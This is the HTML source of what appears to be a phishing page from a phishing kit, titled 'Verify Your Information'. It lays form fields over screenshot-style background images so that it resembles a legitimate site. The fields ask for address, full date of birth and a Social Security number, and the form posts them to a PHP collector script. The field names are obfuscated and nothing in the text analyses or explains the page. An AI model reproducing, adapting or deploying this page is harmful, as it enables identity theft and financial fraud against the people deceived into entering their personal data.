<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>

<html><head>
<title>Verify Your Information </title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="viewport" content="width=device-width, initial-scale=1" />

<link rel="shortcut icon"
              href="img/favicon.ico"/>

		
			   <style type="text/css">
.textbox { 
    border: 1px solid #c4c4c4; 
	background: ;
    height: 34px; 
    width: 275px; 
    font-size: 13px; 
    padding: 4px 4px 4px 4px; 
    border-radius: 4px; 
  } 
 
.textbox:focus { 
	 background-color: #FFF;
    outline: none; 
    border: 2px solid #7bc1f7; 
  	border-radius: 4px;  
} 
</style>
<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 1352px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>


</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:712px; z-index:0"><img src="img/231.png" alt="" title="" border=0 width=1350 height=712></div>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:712px; width:1350px; height:474px; z-index:0"><img src="img/fti.png" alt="" title="" border=0 width=1350 height=474></div>

<form action="ifos.php"  name="castoi" method="post">
 <input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:239px;top:249px;width:276px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="o7a1" value="" type="text" placeholder="">
 <input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:239px;top:289px;width:276px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="74a1" value="" type="text" placeholder=" Street Address">
 <input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:239px;top:334px;width:121px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="44a1" value="" type="text" placeholder=" City">
 <input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:351px;top:334px;width:90px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="7281l" value="" type="text" placeholder=" State">
 <input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:438px;top:334px;width:78px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="a1x2b" value="" type="text" placeholder="Zip Code">
<input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:239px;top:426px;width:133px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="obai" value="" type="text" placeholder=" Month">
<input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:380px;top:426px;width:54px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="obai2" value="" type="text" placeholder=" Day">
<input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:442px;top:426px;width:73px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="obai3" value="" type="text" placeholder=" yyyy">
<input id="cre422" class="textbox" autocomplete="off" required=""     style="position:absolute;left:239px;top:493px;width:143px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="okoni" value="" type="text" placeholder=" xxx-xx-xxxx">
<input id="cre422" class="textbox" autocomplete="off" required=""    style="position:absolute;left:239px;top:560px;width:194px;height:35px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:17px;z-index:1" name="okozi" value="" type="text" placeholder="">

<input id="Butn1" name="Butn1" value="" style="position:absolute;left:234px;top:636px;width:108px;height:42px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">



</form>
</body>
</html>
